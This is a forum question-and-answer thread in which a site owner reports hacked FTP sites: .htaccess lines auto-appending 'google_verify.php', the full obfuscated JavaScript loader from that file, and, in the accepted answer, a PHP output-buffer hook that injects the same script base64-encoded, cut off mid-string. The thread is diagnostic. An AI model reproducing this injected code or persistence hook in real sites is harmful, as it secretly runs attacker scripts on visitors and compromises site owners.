# virus problem google_verify.php and ftp passwords

Tags: .htaccess, ftp, passwords, virus

Couple days ago I had problems with my sites. In all ftp servers I got some php file called google_verify.php and in my .htaccess file the following text was added:

```
<IfModule mod_php5.c>
php_value auto_append_file "google_verify.php"
</IfModule>

<IfModule mod_php4.c>
php_value auto_append_file "google_verify.php"
</IfModule>
```

Here is google_verify.php file:

```
<script>d='function  $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un    
L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 
-z=null}}if(!  z Ztypeof  M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv 
_>, =vars Z 4== =vars A=  /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % 
Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS 
-v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H $rs So 6\'q\') 
8\'\') 6\'v\') I Hi=0;i< $rs hrs[i]=parseInt( $rs[i],16)- k =  $rs 8\',\')+
\',\'}else{ajax gr.offset2=25; =  k}; 9unR ( !){eval( 9  ]UrN L db&& Yt 7 -H( Yt W} 3 
drt 7 OR + rt SR}}  c(" $a",new Date().getTime()); $h : / ]Ikey in(  t) Zfalse== C1]&& 
4==  b A$T=  v(key, C0] W ,t[key] ?t[ $T[0] [$T[1] W;key ST[0]} $h[ $h 7]=key+"="+ 
C0]} 3$R Oh 8 Yx) + rt+ Sh 8 Yx)} Uk L-B="POS <t="";d=\'v={@ VM$1XH:"e-",@ 
V`$1XH:"",*b VM$1Xv30:"l(\\\'l=Str"
\\\\_:"ing.fr",JG*2%a%fzV*aV:"omCha",>%8%8*2*5LB0_*4:"rCode("
<6#fF%3#f#7#d_$4y<d*3*6$eV*e*d$a*3&6R8#b!0G%4#d%eTM `8B6P*3K#6>*4HY/c*dPB1JJ-
a$4*6&9<7E*bQ`NX@U&3W2E*eQ*4?Q*2E&7W5!3%b#e#8!0*8#6J `6PV#c#9!fB3*1V&6W9*7#f%6-3*d#f-
d-fy,a2%2#e T T#c!1&1/b#eT!1#c!1*4*b-d&1/4-f#f%6%2#d 
^5`y<4?T*5KUB6P*3Y/9*eZw*5#a#9A*7&9/1@U TLP 
T&1D3HK%8>O@w*5Y/9O~T@#6T@~&9D1ZwJB6A*eZG&9,d5H*3#8#7E*5?%8&7/d-eF!fJ-eFG%6y
/6B0!2G_%3#f_%3yD0%1EJ%1EHwA&5,d0@$f!2#e$1MX?yD1*9U%aAGA*9A&9,a2#7G-a?*1-bM?I
/1-0-7%4%1$4T#d-c `9J?%8J%3AGE&7Df*e!0*cZA#b!3*2 
`aH-aOB7B7OJGI<2?GJ#aPP?$e&1W5%4z$1*7Gz$1*5I/3*4#d*0!3`!0F!0 `8$dO%6`
%4$4%b!f&5D4OOOB0#eVN-1&3W0*3$b!3*b*aw*0$b&3De%a@UB0#e-dN-1&3W2>M-
3*0K*2*5_&5WeOA%7*3#6-7%e*3&6/4%7!fN f&1,a6M$f_*b#7B1B1#7&5D7#f%a$3XUFPZ 
e9QMAU$1JB4U&9Wf*5*8@$1>U>@YR1
%4Q%6%4UQ%6#7&9Rb$f%fzB3B7*5?*fI/9$1*4#eUUA$1*2&6D6^F#8~#b%0%0F ea%7%eN%7!2 
^7?y/5Z#e#b$e$e_Z*0yD6~GF#8^#c%0%0&4D9#8O>HB5>*d@Y<9*5*5#8>*6>>#7YW1^??*4B7?*fGI
<7*4#6V*eOA$0V&6/2@#d-awA-f#f_yW5!0#b-8*aE-d#d!3&0Wd%8*3%0$e!fT*5@YWeGB7J- 
aB2AAH&9<9%7`-b$e|$3-b$b&5R4$b-d$d$4|-d$4$3 j6-9Q$b%e-9w%7X&3,ac%8zK-c$f$b|-c&6R4%aM-
dN%aB1-d%e j7$a?U-4Q!3!3?&3<2-7%3-7%4-7T-7%6&1,af%f-f$0-f$1-f$3-f&9R3%0N%0X%0M%0`I,acN-
cX-cM-c`-c&6Rc-f$d-f$e-f$f-fB0&9,ac$e-c$f-cB0G!f-
7&6,a0FF#7H#6H^H&4D9P#aP#bP#cP#d&5D2#f!f*1A`$a*3*6&6/4-4GF%6GF*fG&1
/4T!1_AAAF*f&1D3H@KJ@-bPPYD2!f?KT?-aHP&7/6%7ULV-6UB0-4&3R5!fV$d!fV$4!fV&3<7P>$a-
6MM_*b&5RczPJ^#b!3N#d `8M|G-d$bU%2P&5,a9*b>-eG-9%8>-e&1/fV%4ULVNN#e&3/6N*0VQ-
e!3>*4&3W3 ^4#8^@E~#8y<2H>$4%0_?*6*6&5/b#e#e~ ^4_$4zy<0#eV$d*0!3#c#6!3&3W4OJ@-
fG!2#b#6y/2*4OJ@-f#d_$3yW2_^*fU%2H_#7&5/8M$fL%2H_^*f&5/a%0G!3^VN$dU&3<6*4A-
4#fJL#b*0&9D1T*3@-a*5>-3>YD9#9#bH%4-8|$a*4 j5*2#b#6*2#f#6*1#eID0#b#8H#d#6H^#b 
ed#9OG#8~G#9P&1D3#a#7O#f#9O#e#e&7/dO#6GJJGJP&1D5#a#9^#f#a^#a#a&9
/f#8#9!f#8#8!f~~&3D3#c#aO#dO#c#aO&7D9L~LOLJL#6yW0T*3%eM$aH>^Y<d*1~#fZ*0EXM 
ea*4*5$3^^OB5GIR4N-d%b-f#f-5X$4y<e$3KO%bM$4Q*8&5<b%4N*6Q%7%8@K&3D4U$bz
%4Q%6~#b&9DbHB4E~|*4L%f&7R7M$3#dJJ?LV&3<aO@B2O@|O@YRc^G-c^GB3T%2IWaE-
dGP-d@EL&0<3%fZ!fE@!3Q$3&0D1ZQK$1@??U&3Db!3*3>!0#8*2|*9&0<cH!fK#b!fP~!fYW0%8Z$aF*eFH%0 
ec*8*6?#f?$dzZIDd-c!2E@Q@E-c 
`6F$bZ%8`K*1^&4D9#9A$1%eQ$0$1$d&9W1#c~*2*0OF#9F&4,a1B1B1#fE*5*1*4E&4<aE@E?-b^%a| 
j9T`w*9$0w$1w&4R3|G>%8LB2*0>&5W8*2*5>-2P>NL&5,d1A-3~%f$4$4%b`&6,a0-
c-5-4*5@`B5*3Y/dzB2*7*a?-2*f@I/2*6 ^b ^a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA-
1*5`$e$dP&9/3Q`UJHH!0@&0<2$b*5>*c*3%2$b>YWc*0MN`%8#e-d$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^-
5*c*1E&4W3?A%6%b`A@#dy/9*9LA*eJG*2%a&6<aM!1%aT#e TT&1DcT@A-3ZQz|&9<c%1|#a%e%f%eT#b 
`2L#d-eF ^f#d_yRf>L-0P-9X>#fYDd ^9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA-
bH&0<4-8*dE>N-eE*6 ja!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz 
ee!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<6MKQ$1@-4#e!3&3/d!3-6EUE-
7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5 
fHT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7
/f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8|| j4z@!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ-
6MNK$1&3<9?@#d_!2V@$dyR7%a|$aM$3_?G&5/f!f-f%eL%4G#7$f&7/5@O%6NN%a$3w&5Wb$0$1$4KH@>HY
/8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b
%0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK-
fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/9$b!f@V#aUU%f&6D2ZQ%8wz-3%aU 
edVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a-
b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a| jd$4`@GF#cE-8&4D3K%a|*a$1
%aQ%a&5R6z>*1@M%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L-
0$fXX%3%f%bIR4?@#d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f 
^1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d 
`6XPQwwX%8M&3/8*f@$b#6@>-0PY,d2EE-0^E#c-3X j9KZK>-2>$bzY,d1$4Z*5%4?>-3@Y<2#d!0HXE-
d?!0&0WdE$3%fT#e TU&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy
/8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU 
ea~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y
/4*2F*3F*6F*7F&4W8F*9F*aF*bF*c 
e1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`Q
MP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\\\\E:"32);ev",*``ZXK*b$0$1:"al(l)
\\\'",EE!0*9Q>!0#8*2:");"};dk=[] I-r x in v){dk.push(trim(x,v))};e-l(dk 
8\\\'\\\'))!v7#v8$vc%vb&:8*v9+,q-
va/+7<,b>!8?!a@!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+
9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\\\\,#6^L%2*0>$f*2\' Ic=46;c--;d=(t=d 
6\'!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\\\'[c])) 8t.pop())); 9 (=d K &}; 
9unAJAX L dE -q ]+ rN( $R); 3 rr -A 2 Yr)} 3 z){ Hself=this; 3 B=="GET" A$K=  F+  i+ 
Yt , R$K W +  R F W;try{  z.setRequestHeader("Content-Type","application/x-www-form-
urlencoded" 5){}}  z.onreadystatechange !){switch( #z.readyState){case 1: #L 02: #u 
03: #y 04: ;= #z.r (Text; ;XML= #z.r (XML; #C[0 Q; #C[1 QText; 3#w){self.r N 3#A A)= 
#A.nodeName; ).toLowerCase(); 3)=="input Jselect Joption Jtextarea" A#A. >= ; 
+#A.innerHTML= ;}} 3#C[0]=="200" A#J ]+#e()} #rt="";break} Uz.send( Yt)}} Um ],rg()} 
a.ajax : $M();try{ H $G 2\' $D\') *c("query", $G gd gf) *F="query.php" *B SG gB gf 
*rr=\' $rz\' *L SN *u Sg *y Ss *J Sx; P 5){ P)}  this g !=function( #self g $kx_ 
%encodeURIComponent( &e ,rr ?A ?F=file ,t :Object ],C : /(2) (esponse )elemNodeName 
*;ajax g +}else{  ,;   - A  .try{  z :ActiveXObject("M /Array 0();break;case  
2=document.getElementById( 3if(  4true 5)}catch(e 6.split( 7.length 8.join( 9this.r 
:=new  ;self.r ( <T" ,i="?" ,rx="&" ,r =return >value ?=null , @ !){ U A){  C  t[key][ 
G( $j[0], $j[1]) Hvar  I;for( J"|| )==" K ,b= 4 ,w=fals L !  MXMLHttpRequest NunR (()} 
O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open(  B,  S= $ T-d!3 U} , V%b%a#6Q W, 
4) X.XMLHTTP" 5 Y  r Z){if( []= /(  ]()  ^!2* _ L$o,  `&0/ awindow d$R A3  e&4/ 
f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split('   ! # $ % & ( ) 
* + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A C G H I J K L M N O P Q R S T U V W X Y 
Z [ ] ^ _ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)</script>
```

I suspect that my pc is infected with some kind of virus who can read my ftp access parameters from my ftp manager.

Does anybody know something more about this virus and how I can clean my computer?

Thanks in advance

Comment: And what is in `google_verify.php`?

Comment: I added content of google_verify.php file

Comment: I'm currently facing the same problems. Which systems where concerned? Whas it really a local virus problem or did the systems had an vulnerability? Is the problem solved or does it still exists?

Answer (score 4, accepted):

I am no security specialist but one of my sites got the same file. From my limited knowledge and research what happened is that your site got hacked and the google_verify.php file is part of an injection attack.

You should also check other files of you website (specially the index.php/htm/html) and look for:

```
     ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kPSdmdW5jdGlvbiAgJE0oZmlsZSAteiA/UCBMLUI9IkdFIDw9IGEgLHJ0PSIiIEtlICxFPXRydSAmICxyLm9mZnNldD0xMDAgVW4gTC1MIEB1IEB5IEBKIExBOSBOICxlIEBxIExBOSBOIFVtIEwtbiBdLFAgXVVyZyBMLWsoKTsgLnN4bWwyIFgxIEEuaWNyb3NvZnQgWDIgLXo9bnVsbH19aWYoISAgeiBadHlwZW9mICBNIT0idW5kZWZpbmVkIiAteiA6IE0gXSsgRT0gNH19IFVjIF8+IC10WyAkbyBbPixmYWxzZSkgVXYgXz4sID12YXJzIFogND09ID12YXJzIEE9ICAvKCAlICRvKSwgJSA+KSkgKyB0WyAlICRvKSBbJSA+KSBXfSBVSCBMJHAsICRTIEEkVD0gJSBZeCk7cmVnZXhwIDpSZWdFeHAoIFl4KyJ8IisgJFQpOyBILyBTcCA2cmVnZXhwKSBJaT0wO2k8IEgvIGhqPSBIL1tpXSA2Ij0iKTtpZiggND0gU1MgLXYgRyArIGMgR319fTsgYS50cmltIF8kZiBaInFhYmNkZWYiLmluZGV4T2YoICRvLnN1YnN0cigwLDEpKT49MCl7IEggJHJzIFNvIDZcJ3FcJykgOFwnXCcpIDZcJ3ZcJykgSSBIaT0wO2k8ICRycyBocnNbaV09cGFyc2VJbnQoICRyc1tpXSwxNiktIGsgPSAgJHJzIDhcJyxcJykrXCcsXCd9ZWxzZXthamF4IGdyLm9mZnNldDI9MjU7ID0gIGt9OyA5dW5SICggISl7ZXZhbCggOSAgXVVyTiBMIGRiJiYgWXQgNyAtSCggWXQgV30gMyBkcnQgNyBPUiArIHJ0IFNSfX0gIGMoIiAkYSIsbmV3IERhdGUoKS5nZXRUaW1lKCkpOyAkaCA6IC8gXUlrZXkgaW4oICB0KSBaZmFsc2U9PSBDMV0mJiA0PT0gIGIgQSRUPSAgdihrZXksIEMwXSBXICx0W2tleV0gP3RbICRUWzBdIFskVFsxXSBXO2tleSBTVFswXX0gJGhbICRoIDddPWtleSsiPSIrIEMwXX0gMyRSIE9oIDggWXgpICsgcnQrIFNoIDggWXgpfSBVayBMLUI9IlBPUyA8dD0iIjtkPVwndj17QCBWTSQxWEg6ImUtIixAIFZgJDFYSDoiIiwqYiBWTSQxWHYzMDoibChcXFwnbD1TdHIiXFxcXF86ImluZy5mciIsSkcqMiVhJWZ6ViphVjoib21DaGEiLD4lOCU4KjIqNUxCMF8qNDoickNvZGUoIjw2I2ZGJTMjZiM3I2RfJDR5PGQqMyo2JGVWKmUqZCRhKjMmNlI4I2IhMEclNCNkJWVUTSBgOEI2UCozSyM2Pio0SFkvYypkUEIxSkotYSQ0KjYmOTw3RSpiUWBOWEBVJjNXMkUqZVEqND9RKjJFJjdXNSEzJWIjZSM4ITAqOCM2SiBgNlBWI2MjOSFmQjMqMVYmNlc5KjcjZiU2LTMqZCNmLWQtZnksYTIlMiNlIFQgVCNjITEmMS9iI2VUITEjYyExKjQqYi1kJjEvNC1mI2YlNiUyI2QgXjVgeTw0P1QqNUtVQjZQKjNZLzkqZVp3KjUjYSM5QSo3JjkvMUBVIFRMUCBUJjFEM0hLJTg+T0B3KjVZLzlPflRAIzZUQH4mOUQxWndKQjZBKmVaRyY5LGQ1SCozIzgjN0UqNT8lOCY3L2QtZUYhZkotZUZHJTZ5LzZCMCEyR18lMyNmXyUzeUQwJTFFSiUxRUh3QSY1LGQwQCRmITIjZSQxTVg/eUQxKjlVJWFBR0EqOUEmOSxhMiM3Ry1hPyoxLWJNP0kvMS0wLTclNCUxJDRUI2QtYyBgOUo/JThKJTNBR0UmN0RmKmUhMCpjWkEjYiEzKjIgYGFILWFPQjdCN09KR0k8Mj9HSiNhUFA/JGUmMVc1JTR6JDEqN0d6JDEqNUkvMyo0I2QqMCEzYCEwRiEwIGA4JGRPJTZgJTQkNCViIWYmNUQ0T09PQjAjZVZOLTEmM1cwKjMkYiEzKmIqYXcqMCRiJjNEZSVhQFVCMCNlLWROLTEmM1cyPk0tMyowSyoyKjVfJjVXZU9BJTcqMyM2LTclZSozJjYvNCU3IWZOIGYmMSxhNk0kZl8qYiM3QjFCMSM3JjVENyNmJWEkM1hVRlBaIGU5UU1BVSQxSkI0VSY5V2YqNSo4QCQxPlU+QFlSMSU0USU2JTRVUSU2IzcmOVJiJGYlZnpCM0I3KjU/KmZJLzkkMSo0I2VVVUEkMSoyJjZENl5GIzh+I2IlMCUwRiBlYSU3JWVOJTchMiBeNz95LzVaI2UjYiRlJGVfWioweUQ2fkdGIzheI2MlMCUwJjREOSM4Tz5IQjU+KmRAWTw5KjUqNSM4Pio2Pj4jN1lXMV4/Pyo0Qjc/KmZHSTw3KjQjNlYqZU9BJDBWJjYvMkAjZC1hd0EtZiNmX3lXNSEwI2ItOCphRS1kI2QhMyYwV2QlOCozJTAkZSFmVCo1QFlXZUdCN0otYUIyQUFIJjk8OSU3YC1iJGV8JDMtYiRiJjVSNCRiLWQkZCQ0fC1kJDQkMyBqNi05USRiJWUtOXclN1gmMyxhYyU4ekstYyRmJGJ8LWMmNlI0JWFNLWROJWFCMS1kJWUgajckYT9VLTRRITMhMz8mMzwyLTclMy03JTQtN1QtNyU2JjEsYWYlZi1mJDAtZiQxLWYkMy1mJjlSMyUwTiUwWCUwTSUwYEksYWNOLWNYLWNNLWNgLWMmNlJjLWYkZC1mJGUtZiRmLWZCMCY5LGFjJGUtYyRmLWNCMEchZi03JjYsYTBGRiM3SCM2SF5IJjREOVAjYVAjYlAjY1AjZCY1RDIjZiFmKjFBYCRhKjMqNiY2LzQtNEdGJTZHRipmRyYxLzRUITFfQUFBRipmJjFEM0hAS0pALWJQUFlEMiFmP0tUPy1hSFAmNy82JTdVTFYtNlVCMC00JjNSNSFmViRkIWZWJDQhZlYmMzw3UD4kYS02TU1fKmImNVJjelBKXiNiITNOI2QgYDhNfEctZCRiVSUyUCY1LGE5KmI+LWVHLTklOD4tZSYxL2ZWJTRVTFZOTiNlJjMvNk4qMFZRLWUhMz4qNCYzVzMgXjQjOF5ARX4jOHk8Mkg+JDQlMF8/KjYqNiY1L2IjZSNlfiBeNF8kNHp5PDAjZVYkZCowITMjYyM2ITMmM1c0T0pALWZHITIjYiM2eS8yKjRPSkAtZiNkXyQzeVcyX14qZlUlMkhfIzcmNS84TSRmTCUySF9eKmYmNS9hJTBHITNeVk4kZFUmMzw2KjRBLTQjZkpMI2IqMCY5RDFUKjNALWEqNT4tMz5ZRDkjOSNiSCU0LTh8JGEqNCBqNSoyI2IjNioyI2YjNioxI2VJRDAjYiM4SCNkIzZIXiNiIGVkIzlPRyM4fkcjOVAmMUQzI2EjN08jZiM5TyNlI2UmNy9kTyM2R0pKR0pQJjFENSNhIzleI2YjYV4jYSNhJjkvZiM4IzkhZiM4IzghZn5+JjNEMyNjI2FPI2RPI2MjYU8mN0Q5TH5MT0xKTCM2eVcwVCozJWVNJGFIPl5ZPGQqMX4jZloqMEVYTSBlYSo0KjUkM15eT0I1R0lSNE4tZCViLWYjZi01WCQ0eTxlJDNLTyViTSQ0USo4JjU8YiU0Tio2USU3JThASyYzRDRVJGJ6JTRRJTZ+I2ImOURiSEI0RX58KjRMJWYmN1I3TSQzI2RKSj9MViYzPGFPQEIyT0B8T0BZUmNeRy1jXkdCM1QlMklXYUUtZEdQLWRARUwmMDwzJWZaIWZFQCEzUSQzJjBEMVpRSyQxQD8/VSYzRGIhMyozPiEwIzgqMnwqOSYwPGNIIWZLI2IhZlB+IWZZVzAlOFokYUYqZUZIJTAgZWMqOCo2PyNmPyRkelpJRGQtYyEyRUBRQEUtYyBgNkYkYlolOGBLKjFeJjREOSM5QSQxJWVRJDAkMSRkJjlXMSNjfioyKjBPRiM5RiY0LGExQjFCMSNmRSo1KjEqNEUmNDxhRUBFPy1iXiVhfCBqOVRgdyo5JDB3JDF3JjRSM3xHPiU4TEIyKjA+JjVXOCoyKjU+LTJQPk5MJjUsZDFBLTN+JWYkNCQ0JWJgJjYsYTAtYy01LTQqNUBgQjUqM1kvZHpCMio3KmE/LTIqZkBJLzIqNiBeYiBeYSo3ITJPeUQzJTckNHckZSoyKjIkMyRhJjVSNU5BLTEqNWAkZSRkUCY5LzNRYFVKSEghMEAmMDwyJGIqNT4qYyozJTIkYj5ZV2MqME1OYCU4I2UtZCRhJjNXNT4jOSM2JWFNS0IxKjNZLGFlLTgqMUZeLTUqYyoxRSY0VzM/QSU2JWJgQUAjZHkvOSo5TEEqZUpHKjIlYSY2PGFNITElYVQjZSBUVCYxRGNUQEEtM1pRenwmOTxjJTF8I2ElZSVmJWVUI2IgYDJMI2QtZUYgXmYjZF95UmY+TC0wUC05WD4jZllEZCBeOSo0I2YhMiNhTio0eVJiLTYlM3ctMCUzJWYlNz95LzclOFQlMSU0RUEtYkgmMDw0LTgqZEU+Ti1lRSo2IGphITMqZio5VSNlVio1ITMmMy9kTkhCNEI0QjQqMiUxfCY3UmMqMUVYeiNmRVh6IGVlIWZBJDEkZVQ/flomNjw1JDQtNS00KjMqMCU2TiVlJjA8Nk1LUSQxQC00I2UhMyYzL2QhMy02RVVFLTdMJDMmMDxkeio5enokYSQxJWEkZFlSY1pIIWYkYiRhJWIhZn5ZPDFFWnx8TiNmfn4mNTw5YCQxIzZ6JGYkMXp6WTxiYH53TiQzXiM3XiY2UjUgZkhUJTImMTxjJWZ6UFpYUSQxKjImMyxhZUEkMCUxR0ElMFYqYSY2RDhHJWFMLTd8YCRlUUkvZkhKIzhCNSpiJTgkYksmNy9mJTMlM0xIKjV+IzhFJjdEZkYqOEFePyExSCExJjEvNyo0TkskZUUqOHx8IGo0ekAhM0YqMC0wJTRNJjNSMCM2JGF3WEtNTkhZL2NQTVEtNk1OSyQxJjM8OT9AI2RfITJWQCRkeVI3JWF8JGFNJDNfP0cmNS9mIWYtZiVlTCU0RyM3JGYmNy81QE8lNk5OJWEkM3cmNVdiJDAkMSQ0S0hAPkhZLzgqY0cjOUxfI2YqMCU3JjVSNndUJWZCMUZMRio3JjQ8YiUwViUxRiFmR0IxdyY0PGMkM1QkYiEwVVh3JDMmMDw5JTJ3S3ckNHwjYSU4JjBSMUtLWlg+XiRld1lSNkZGSkVLLWZaJTEmNDw1KjAlNyM4JGIkZiVmekIzSUQzX35PJThaJTZNKjgmNVI4WiVlKmEkZFAjYUEqYiY5LzkkYiFmQFYjYVVVJWYmNkQyWlElOHd6LTMlYVUgZWRWViM2QU4lMUxMJjY8MUEjYVpgSyRlWCVlJjlSMFghMiM3JWIlOCQ0JTMlZnk8YlYjYyVhfnwlYiRhLWImNixhNSo0JGZUXyRmP0whMSYxRGUqND8qOCFmTCRhJWF8IGpkJDRgQEdGI2NFLTgmNEQzSyVhfCphJDElYVElYSY1UjZ6PioxQE0lM0g+WS9lI2MjYyNhI2FKKjcqN0EmOURlSiQwd1ElYmBLRiY0VzVMLTAkZlhYJTMlZiViSVI0P0AjZCEyI2VOJTdYeSxhYSVmJDMlYlYqNCFmQjFBJjY8MyNmIF4xVCUzJWUlZSU0eTxhSyQ0KjYlMyRiQSpiSiY5RDFWIzhWKjlBLTElMSUyJjYvOT9FKmIkZSQwTiViWCY3UjchMCo1dyU2PiEwKjYjZCBgNlhQUXd3WCU4TSYzLzgqZkAkYiM2QD4tMFBZLGQyRUUtMF5FI2MtM1ggajlLWks+LTI+JGJ6WSxkMSQ0Wio1JTQ/Pi0zQFk8MiNkITBIWEUtZD8hMCYwV2RFJDMlZlQjZSBUVSYxLzYhMy0wKjEjZkolN0t8JjNXNEchZj4qMUtOYEwmNjw1I2YjYSM5I2RUI2QlNiNmeS84JDQjZCU0TCQzJDBLdyYwUjY/QV9WKjItMy04LTl5PDIlNCVhQjglNiU2Pz8/SS81Rj5GQUY/RlUgZWF+P14/IzY/Izc/SUQ3QSM4QSNiQSNkQSM5JjkvNSM2XyNhXyNiXyNjXyY1VzA+KjE+KjI+KjM+KjRZLzQqMkYqM0YqNkYqN0YmNFc4Rio5RiphRipiRipjIGUxKmEhMSpiITEqYyExKmQhMSYxLGE3UCM4JGQkZkskZCRlekkvOSU0TCNlQXwjZSU0I2QmMUQ5I2IqNyM5KjIjYVB+QjBZRDJKSiM3JDNgUU1QJjlSZSM4JGF8JGFKT09PSURjJTZNJTJaQVQ/JjFcXFxcRToiMzIpO2V2IiwqYGBaWEsqYiQwJDE6ImFsKGwpXFxcJyIsRUUhMCo5UT4hMCM4KjI6Iik7In07ZGs9W10gSS1yIHggaW4gdil7ZGsucHVzaCh0cmltKHgsdikpfTtlLWwoZGsgOFxcXCdcXFwnKSkhdjcjdjgkdmMldmImOjgqdjkrLHEtdmEvKzc8LGI+ITg/IWFAIWJBITlCdmREKzhFITdGITRHIWRIIzBJOjkwSiMySyVjTCFlTSQ3TiQ1TyMzUCMxUSQyUixjVCU1VSFjViE2Vys5WCQ2WSY4WiVkXiM1XyE1YCQ4dyU5eSYyeiRjfCQ5fiM0XFxcXCwjNl5MJTIqMD4kZioyXCcgSWM9NDY7Yy0tO2Q9KHQ9ZCA2XCchIyQlJiorLS88Pj9AQUJERUZHSElKS0xNTk9QUVJUVVZXWFlaXl9gd3l6fH5cXFxcXCdbY10pKSA4dC5wb3AoKSkpOyA5ICg9ZCBLICZ9OyA5dW5BSkFYIEwgZEUgLXEgXSsgck4oICRSKTsgMyByciAtQSAyIFlyKX0gMyB6KXsgSHNlbGY9dGhpczsgMyBCPT0iR0VUIiBBJEs9ICBGKyAgaSsgWXQgLCBSJEsgVyArICBSIEYgVzt0cnl7ICB6LnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIgNSl7fX0gIHoub25yZWFkeXN0YXRlY2hhbmdlICEpe3N3aXRjaCggI3oucmVhZHlTdGF0ZSl7Y2FzZSAxOiAjTCAwMjogI3UgMDM6ICN5IDA0OiA7PSAjei5yIChUZXh0OyA7WE1MPSAjei5yIChYTUw7ICNDWzAgUTsgI0NbMSBRVGV4dDsgMyN3KXtzZWxmLnIgTiAzI0EgQSk9ICNBLm5vZGVOYW1lOyApLnRvTG93ZXJDYXNlKCk7IDMpPT0iaW5wdXQgSnNlbGVjdCBKb3B0aW9uIEp0ZXh0YXJlYSIgQSNBLiA+PSA7ICsjQS5pbm5lckhUTUw9IDt9fSAzI0NbMF09PSIyMDAiIEEjSiBdKyNlKCl9ICNydD0iIjticmVha30gVXouc2VuZCggWXQpfX0gVW0gXSxyZygpfSBhLmFqYXggOiAkTSgpO3RyeXsgSCAkRyAyXCcgJERcJykgKmMoInF1ZXJ5IiwgJEcgZ2QgZ2YpICpGPSJxdWVyeS5waHAiICpCIFNHIGdCIGdmICpycj1cJyAkcnpcJyAqTCBTTiAqdSBTZyAqeSBTcyAqSiBTeDsgUCA1KXsgUCl9ICB0aGlzIGcgIT1mdW5jdGlvbiggI3NlbGYgZyAka3hfICVlbmNvZGVVUklDb21wb25lbnQoICZlICxyciA/QSA/Rj1maWxlICx0IDpPYmplY3QgXSxDIDogLygyKSAoZXNwb25zZSApZWxlbU5vZGVOYW1lICo7YWpheCBnICt9ZWxzZXsgICw7ICAgLSBBICAudHJ5eyAgeiA6QWN0aXZlWE9iamVjdCgiTSAvQXJyYXkgMCgpO2JyZWFrO2Nhc2UgIDI9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIDNpZiggIDR0cnVlIDUpfWNhdGNoKGUgNi5zcGxpdCggNy5sZW5ndGggOC5qb2luKCA5dGhpcy5yIDo9bmV3ICA7c2VsZi5yICggPFQiICxpPSI/IiAscng9IiYiICxyID1yZXR1cm4gPnZhbHVlID89bnVsbCAsIEAgISl7IFUgQSl7ICBDICB0W2tleV1bIEcoICRqWzBdLCAkalsxXSkgSHZhciAgSTtmb3IoIEoifHwgKT09IiBLICxiPSA0ICx3PWZhbHMgTCAhICBNWE1MSHR0cFJlcXVlc3QgTnVuUiAoKCl9IE8gLXJ0Kz0gWXgrICQgUGFqYXgucnVuQUpBWCggUV09ICN6LnN0YXR1cyBSei5vcGVuKCAgQiwgIFM9ICQgVC1kITMgVX0gLCBWJWIlYSM2USBXLCA0KSBYLlhNTEhUVFAiIDUgWSAgciBaKXtpZiggW109IC8oICBdKCkgIF4hMiogXyBMJG8sICBgJjAvIGF3aW5kb3cgZCRSIEEzICBlJjQvIGYkMyU2JWZUJDQgZy4gJCBoIDc7aSsrIEEkIGomNzwgayAkZlsgJG9dfSc7Zm9yKGM9MTMwO2M7ZD0odD1kLnNwbGl0KCcgICAhICMgJCAlICYgKCApICogKyAsIC0gLiAvIDAgMiAzIDQgNSA2IDcgOCA5IDogOyA8ID0gPiA/IEAgQSBDIEcgSCBJIEogSy